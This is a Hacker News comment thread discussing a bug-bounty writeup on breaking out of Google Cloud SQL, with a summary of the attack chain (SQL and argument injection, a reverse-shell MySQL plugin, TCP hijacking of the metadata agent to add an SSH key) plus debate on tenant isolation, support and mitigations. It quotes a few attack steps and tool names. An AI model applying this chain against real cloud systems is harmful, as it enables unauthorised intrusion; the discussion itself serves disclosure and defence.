Hacker News new | past | comments | ask | show | jobs | submit login
How to contact Google SRE by dropping a shell in Cloud SQL (offensi.com)
639 points by fanf2 on Aug 19, 2020 | hide | past | favorite | 98 comments

> One of our interesting findings was the iptables rules, since when you enable Private IP access (Which cannot be disabled afterwards), access to the MySQL port is not only added for the IP addresses of the specified VPC network, but instead added for the full IP range, which includes other Cloud SQL instances.

> Therefore, if a customer ever enabled Private IP access to their instance, they could be targeted by an attacker-controlled Cloud SQL instance. This could go wrong very quickly if the customer solely relied on the instance being isolated from the external world, and didn’t protect it with a proper password.

I'm not convinced by this, I'm not sure it is vulnerable in the way the author is suggesting "they could be targeted by an attacker-controlled Cloud SQL instance".

First of all, GCE has firewall rules outside of iptables. But the main thing is that the way Cloud SQL does Private IP is via VPC peering. Google creates a VPC on their side, runs MySQL in it, and peers that VPC with your VPC. You actually tell Google what CIDR range to use in the their VPC (the Cloud SQL VPC).

I don't think is it fair to assume that all customers are in the same VPC, and same subnets, with routes between them, and no GCE firewall rules blocking them.

We found every Cloud SQL instance runs in a Google-owned project called "speckle-umbrella-<num>", with <num> being a number between 1 and 80. Each speckle-umbrella-* project contains several Cloud SQL instances, of different customers, and they do seem to be on the same network and without proper firewalling, because we ran zmap on and could see several IPs with the MySQL port open (We did not try to connect to any of them though).

This problem would have probably been avoided if Cloud SQL used different tenant projects per customer (Something most other GCP services do), but for some reason it doesn't do that.

That is interesting. There is some magic networking going on if Google allows every customer to allocate an IP range of their choice, and the customer can use all the IPs in that range, and Google runs multiple customers on the same network (same VPC and subnet).

A project can contain multiple VPCs. And a VPC can contain multiple subnets, but not with overlapping ranges.


I’d agree. The main risk might be wider access within the customers VPC (so lateral move risk). But it’s hard to know without understanding the wider environment.

The lengths you have to go to talk to a real person at Google!

On a similar note, if you ever worried about how to delete your facebook/social media account you can just upload porn

Alternatively, you can go on teamblind to chat with one AND get berated for having a lower TC!

We had an issue with our GKE cluster once, which first threw an unknown error during a (much anticipated) bug fix release, and was subsequently stuck in some kind of loop. No other deployments could be created, three notifications about an unknown error were spawned per second, the audit log was overflowing. Tried to reach someone at google, no chance. The situation fixed itself after a few days, presumably some kind of timeout was reached.

This is Google Cloud GKE? You can't speak to support there within a few days on a paid account when their systems completely break?

Unless you pay for a separate support subscription, no. Not even if it’s their systems at fault.

I mean, this seems fair to me. If you want support, you have to pay for it.

If I'm paying for a service, I expect to be able to speak to someone when that service breaks. If Google Cloud breaks my GKE cluster, it's unreasonable that I can't get anyone to go and fix it without having to pay extra money.

If I break it, sure, fine, no problem. IF it's their fault, I expect to be able to hold them to account.

That's absolutely not the agreement. If the service breaks you will be eligible for SLA credits if the service downtime exceeded the SLA target.

The GKE SLO is something like no more than 3.5 hours of downtime per month.

"I expect to hold them to account".

No - if you are not paying for support you will just be able to claim the credits. You do this by filling out a form within 30 days. That's it.

I, and I'm sure others, appreciate this response. But I think if someone is under the belief that "I expect to hold them to account", then the only appropriate response is: "Then GCP is not for you"

Not entirely true. If you have a business need that demands this level of holding another big company to some account / get some response, then you pay for it.

I think google's higher end service level starts with a $150K/year base fee + cut of spending. That's actually a pretty good deal (1FTE) to have your back much more covered when there are issues - I think they work towards 15 minute response times there. Plus they can help you avoid screwing up your own redundancy planning through reviews of your setup.

What wasn't clear from parent was do they expect to hold google ($100B+/year) to account while spending $2,000/month - that isn't going to happen at all as google as already outlined how they will compensate you for downtime.

Finally - for really large deals you can negotiate with their sales folks.

An important distinction, absolutely.

This is all typically agreed upon well in advance of signing any kind of contract via SLAs and whatnot. So none of this should be a surprise after you've come on-board.

The /mysql/tmp/greetings.txt trick was cute

but do kids these days not know about https://linux.die.net/man/1/wall ?

Do adults these days not know that wall(1) doesn't work unless you have a proper login session and tty, which a reverse shell as OP used certainly does not do for you? :-)

These systems are stripped down to the bare minimum. There's no reason to believe that every "standard" program, and certainly not a setgid programs like wall or write, would be present.

All you need is write access to the pty fd (or in the case of a reverse shell, just the fd of the tcp socket). The SREs could talk to the hackers and the hackers could just echo stuff in their terminal which the SREs could read. Writing a file to disk is less l33t, but more straightforward :)

Edit: I think I was wrong; you can't manipulate network socket fds this way, you'd have to use ptrace() on the process. If it were a real shell with a pty I believe what I suggest could work, but reverse shells don't open ptys.

The "# cat greetings.txt" has a # suggesting they sorted out a real pty somehow. Or it was faked later :)

The usual trick to get a pty is `script /dev/null` by the way, if that command is available

I prefer https://linux.die.net/man/1/write to contact a specific user on a console (if they have `mesg y`). Learnt it and played a lot with it during high school days on an HP-9000 where terminals were actual dumb terminals. It was fun!

> wall (an abbreviation of write to all)

I didn't know what it stood for, at least :)

`man wall` - always a good introduction!


NAME wall - write a message to all users

Nice work and writeup. All stemming from very basic mistakes -- SQL and command injection.

Worrying that the CloudSQL internals (like the private IP range) aren't strongly walled off. It will be interesting to see how this changes in response to the researchers' work.

Argument injection rather than command injection, but yes.

The canonical document on argument injection is here btw:


looks like a shortcut:

> the container was configured with the Docker host networking driver (–network=host).

unreal. lol.

Probably wasn't meant to be a security boundary.

This is the type of write up that used to appear in hackernews great work

It is evidently the type of write up that is still posted to HN.

Yep less and less we see this

HN was never really about this kind of hacking as far as I can tell. Mostly about hackers in the broader "creative problem solving" sense.

It used to be 'Startup News'.

Silicon Valley Crier

Ah, I remember the olden days of HN well. When the front page rang with shouts of "HERE YE, HERE YE, THINGS YE SHOULD KNOW ABOUT EQUITY DILUTION!"

Are those kind of explorations even legal ? I understand there was no wrong intentions, just curiosity.

I want to read more about things like this, but it feels reckless on the authors part ?!

Legal, encouraged and rewarded. Bug bounty programs allow hackers doing these kind of explorations. Although most programs advise you not to do anything once you get code execution as it might break things on production, so the final part where they started intercepting traffic might not be something I would do, but they took a calculated risk, that this is is docker container that does no critical work and it would be interesting to see if we could break out of it. So that's fine.

You can read up more of such reports at hackerone.com/hackitivity or just searching about bug bounty writeups for X organization

Would it be illegal without the clear terms allowing it in the context of a bug bounty program?

Almost certainly

your hackeone link:

"Page not found

The page you are looking for does not exist. "

You have to realize something and its true for Azure, AWS and Google (practical experience):

You have to pay for your support and its not cheap.

Its a good thing on one side: You get yourself a cheaper selfservice solution and you can use a ton of stuff until you really need support. Its a bad thing as you haven't thought about this and support costs money.

Big company with Support contract with Google: Its awesome. Srsly. You get an answer in the next 4h, they will experiment, they will talk to the product teams, they will keep you posted etc.

Yes, I have experienced both the "quasi direct line" and the "just a startup" side. Things are different. And it does make sense that things are this way. :-)

Thank you!

CloudSQL (expensive wrapper around mysql) restricts you changing the wait_timeout which is really terrible when using cloudfunctions OR innodb_flush_log_at_trx_commit. Now! With my own reverse shell I can finally edit the CloudSQL variables and contact a SRE.


Google cloud SQL does not prevent you from changing wait_timeout (https://cloud.google.com/sql/docs/mysql/flags)

However, it seems like innodb_flush_log_at_trx_commit is not supported indeed.

They write up is excellent, but here there is a tl;dr

The Google Cloud console offers a way to export data into cloud storage based on a SQL query expression.

By exploiting a SQL injection vulnerability related to that SQL query expression field, the attacker learned that they had file write access to /mysql/tmp.

The attacker found a second vulnerability affecting the API endpoint used to export data. This endpoint invokes mysqldump behind the scenes.

Then, the attacker creates a database with a malicious plugin embedded in a BLOB. This plugin is a C program that creates a shell process where standard input and output file descriptors are an alias for a socket file descriptor, creating a "reverse shell" where the attacker can execute commands remotely.

Then, this malicious database was imported via mysqldump, and the malicious plugin was written to /mysql/tmp, then loaded, thus executing the malicious plugin.

Using the reverse shell created by the malicious plugin, the attacker found that the process was running in a Docker container using host networking, which could be used by the attacker to monitor network traffic in the VM host machine.

Using traffic monitoring, the attacker found traffic related to the Google Guest Agent, and then used a TCP connection hijack attack to hijack connections to the Google Guest Agent.

The connection hijacking was used to trick the Google Guest Agent to authorize a new SSH user, which was then used to escape the Docker container VM.

Thank you! The article lost me after the reverse shell, but your explanation helped me to understand.

Google CTF event is this weekend, I believe it's not too late to gather a team , register it, and take a part ; such events are a very special kind of fun; I participated in one of CTFs recently, and quickly understood limits of my knowledge, as well as multitude of ways to enrich given context, and exploit it.

You had to scroll all the way down the article, but:

>Therefore, if a customer ever enabled Private IP access to their instance, they could be targeted by an attacker-controlled Cloud SQL instance. This could go wrong very quickly if the customer solely relied on the instance being isolated from the external world, and didn’t protect it with a proper password.

Anyone care to expand on that? Would that be common practice?

They're making a reasonable assumption for a bare-metal network, but their conclusion doesn't hold for Google Cloud (and likely Azure/AWS). A customer's Cloud SQL instances do not live in the same VPC as another customer's, and in Google Cloud, VPCs are fully isolated -- in VPC A is a distinct network from in VPC B, and the two cannot communicate unless there is a Cloud VPN, VPC peering, or a multi-NIC instance acting as a bridge between the two. The broad firewall rule is harmless; I must admit I'm not even sure why the iptables rules are there at all. Probably something about security and onions.

Source: I work in GCP support.

If you work in GCP support, have you ever looked at the Cloud Spanner project(s) in Pantheon? There are thousands and thousands of Cloud SQL VMs sitting in one project, so it's absolutely plausible that there might be some traversal possibilities.

Hopefully not much in prod, but I'm sure there are a lot of staging and dev databases which aren't protected by meaningful credentials.

I dont think this would really happen. You aren't likely running directly on bare metal, you're probably still encapsulated within a VM. The host system will also have it's own set of layer2, and layer3 firewall rules in additional to ARP locks, etc.

It depends on what else is on the same VPC network. Ip address spaces are virtual here.

In practice, this network may only contain instances of limited use cases.

Just remembered - a long time ago, in a galaxy far, far away, to drop into debugger - and get superuser permissions - on BESM-6 one could launch a clone of "Colossal cave" on a terminal, get to a particular place inside and wave a magic wand...

Wow, thanks for the nostalgia trip!

I think I might alias "XYZZY" to "sudo -i" :)

That must've been such an exciting moment to have someone say hello.

Chilling too.

More importantly, it means those same employees probably have unaudited access to the data in your cloud SQL database.

If SRE can write a file to the filesystem, they can totally copy the database files out too.

I completely support SRE being able to log into instances for debugging, but them being able to do that without leaving an audit trail visible to me, the data owner, isn't up to modern standards IMO.

As far as I can tell, there is nothing in the writeup that suggests the file wasn't there from the beginning and present on all Cloud SQL instances. I know this was a standard practice in a few of the products I worked on where we expected the first few layers of security/obfuscation would be peeled off by curious outsiders.

This seems much more likely than OP's exploration being detected in realtime, then someone SSHing into the container manually to put a message.

Disclaimer: I work at Google, not on Cloud SQL, and don't know anything specific about that greetings.txt.

> Not long after we started exploring the environment we landed our shell in we noticed a new file in the /mysql/tmp directory named ‘greetings.txt’

I interpreted the "new" as meaning that it wasn't there before

I work on Cloud SQL, we definitely don't add a file like that.

It could be the case that SRE recognized our accounts since we are hunting on a daily basis.

In rare cases SRE's reach out to ISE's who contact us on their behalf. In this case a file was added. I personally don't see any reason why this would be a bad thing, it's a managed service and we tried to attack it after all. No data was removed, nor is there any indication that there are no audit trails. I hold both the ISE's and SRE's in extremely high regard. (If you try to Hunt for bugs in GCP you will find out why)

Cloud SRE should have a button to click to grant themselves access to an instance.

That button should create for them a fully logged SSH connection to the VM, and the data owner should be notified that SRE has connected. The data owner should then be able to see the commands executed via the SSH connection, and also request an explanation of what the SRE was doing.

The vast majority of instances are going to be things like "your instance hit a SIGSEGV, we logged in to grab the crash dump" or "your instance had a much higher than usage than all other users. We logged in to run tools to find where is was going".

That would be acceptable since I could immediately close my account once SRE had connected due to the data breach.

To be more serious, it would be unacceptable for me that an employee can, for whatever reason, access my instance without my express permission and oversight. Even crash dumps could contain very sensitive information.

Well its called managed infrastructure for a reason.

Even in managed infrastructure, taking data out of the infrastructure is unacceptable.

I don't think there is a good solution yet for products like cloud SQL to make it theoretically impossible for an evil hosting company to steal your data.

But it should be possible for a client to audit all accesses, and the audit logging system be robust enough to catch evil employees.

I doesn't have to be impossible to access but the hoster shouldn't just log into my system and download arbitrary data from it. I'm not asking for perfect confidentiality, just contractual confidentiality.

Who audits the audit system? If I'm an evil employee I'll make sure my requests don't show up there.

So a company goes to the effort of creating an audit system, but gives everyone the ability to modify the history?

If your threat model is a single rogue employee, auditing systems address the issues. If your threat model is "the whole company works against you", you probably shouldn't be using any company to host your infra, so host it yourself, because there's no way to be secure in that situation.

Sounds like you should operate your own infrastructure.

He could just use AWS.

How do we know the same thing can't happen there, with respect to employees accessing data, etc? My point is unless you manage it yourself, you don't know.

In the tcpdump screenshot the hostname is something.bugbounty.internal . Was the author running against specific bugbounty machines or something?

The tcpdump screenshot was created after the bug was fixed. It demonstrates the interception of traffic generated by the Google Accounts Daemon on a instance running within my personal project.

Curious about the container capabilities that enabled them to attack the host network: per the docs [1] containers do not get `CAP_NET_ADMIN` by default, but they do get `CAP_NET_RAW`. I assume that's what allowed them to inspect/inject and network traffic and thus spoof the HTTP response.

So `docker run --net=host --cap-drop=NET_RAW` seems like it might be a good idea. I wonder if it's still needed for `ping` and such in modern Linux?

[1] https://docs.docker.com/engine/reference/run/#runtime-privil...

Mostly its not needed for ping but the config is not yet great in all distros, I talked about this in https://docker.events.cube365.net/docker/dockercon/content/V...

Hey, I recognize Offensi from the Liveoverflow video! [1]

I've been reading some Google VRP writeups [2] in order to inspire me in my bug bounty journey. There are a few by Ezequiel Pereira and Offensi. There's some really cool stuff, that go beyond XSS.

[1] https://www.youtube.com/watch?v=E-P9USG6kLs [2] https://github.com/xdavidhu/awesome-google-vrp-writeups

I had never heard of a reverse shell before. That is a very neat and simple little trick!

You might also like https://en.wikipedia.org/wiki/Shellcode if you haven't heard of that either.

Shellcodes are binary strings that you write to memory or execute another way (like this plugin situation) through an exploit to actually initiate a shell under that process' user id. This can be local on a setuid process for escalation or remote (there are 2 other types in that article in addition to the reverse shell).

Thanks for the share!

Heh, glad I wasn't the only one. When I read that part I thought to myself, "Damn, how did I not know that was a thing".

This is straight out of pentesting 101! Extremely common trick, practically the #1 thing everyone does after they get code execution.

I was able to follow this until the point of escaping the container.

How did they get the user wouter created on the host and how did it have sudo access?

GCP supports remotely loading public ssh keys onto a box. They do this using the metadata endpoint - this is (in theory) a trusted API endpoint available to instances @ IAM actually uses this - when you call other services, client libs reach out to the metadata endpoint and get IAM creds to send with each request.

Anyway, they have a local process that polls the metadata endpoint and adds authorized keys on the host. So you can e.g. upload your public key in the web UI, their metadata endpoint will serve it up on your instance, the guest agent will poll the metadata endpoint and add your key to the authorized_keys file.

These folks spoofed a response from the metadata endpoint. They used https://github.com/kpcyrd/rshijack to inject their own hand-crafted public key, which the guest agent happily added to authorized_keys (and created the wouter user).

They then ssh'd using their key:

> ssh -i id_rsa -o StrictHostKeyChecking=no wouter@localhost

> Once we accomplished that, we had full access to the host VM (Being able to execute commands as root through sudo).

Looks like they had passwordless sudo as well.

What's a mitigation for the spoofed packet? TLS or something of the sort?

If the docker container was running with something other than --net=host, it could have been avoided easily with standard networking concepts (route tables with reverse path filtering or iptables rules), even if the attacker somehow managed to get CAP_NET_ADMIN in the container the host network namespace still would refuse the packets. Although, with --net=host you could actually add iptables rules that match based on the cgroup and limit the IPs/ports allowed. It'd also be possible to filter the container's syscalls with seccomp. I'm not entirely sure why the container had CAP_NET_ADMIN at all, which is required for tcpdump and the man in the middle. Also, using user namespaces would have limited the attacker's abilities even if they had root in the container. A lot of defense in depth techniques are possible here.

There's also: simply not leaving the gcp login backdoor open. We run our gcp instances similar to ec2: on first boot we take the ssh keys from the metadata service and lay them down and do not run the GCP agent, we have standard config management + ldap for login after the first boot. This means that a hacker gaining access to your GCP credentials can't gain a shell on an existing instance trivially.

Well for one not giving the container access to eth0 in the host. Ideally the container would be configured with its own network namespace, the portion of the article that mentions host network mode is talking about this. Instead of eth0 in the container just being able to see its own traffic due to how it was configured it could sniff and spoof traffic directly on the host's interface.

But yeah, it seems strange to me that the metadata endpoint isn't secured via TLS. I guess they figured they had sufficiently prevented any kind of MitM attack (but obviously not in this case) so it was unnecessary?

GCE uses this tool to allow a central metadata server to manage users: https://github.com/GoogleCloudPlatform/guest-agent#account-m...

The host VM had this running. Since they had access to the host's network (due to running in a `--network=host` container), they were able to spoof the response from the metadata server to say a new user should be added to `.authorized_keys`, with their supplied public key. The guest agent automatically adds the new users to the `sudoers` group, also giving them sudo access.

I'm curious why this host would have this running on it? Do GCP VMs co-locate with cloud SQL instances? I'd think it'd be separate infrastructure but maybe Google is just really good at binpacking (likely).

Cloud sql instances actually running on GCE VMs, as suggested by the post, which makes sense as well.

> Most of the time, we were able to type fast enough to get a successful SSH login :)

I thought it would have been automated by a script. Either they are super fast typers or the metadata server is quite slow!

Looks like the metadata service uses HTTP long polling (“ This request also includes a timeout (timeout_sec=<TIME>)”), so I think they had a <TIME> second head-start in racing against the real metadata response.

All this is interesting read knowing so many people are still using MySQL 5.7 . No announcement this week on new version support.

Will you ever be in MySQL 8

This is excellent, I wonder how to reach such a level of understanding.

Applications are open for YC Winter 2023

Guidelines | FAQ | Lists | API | Security | Legal | Apply to YC | Contact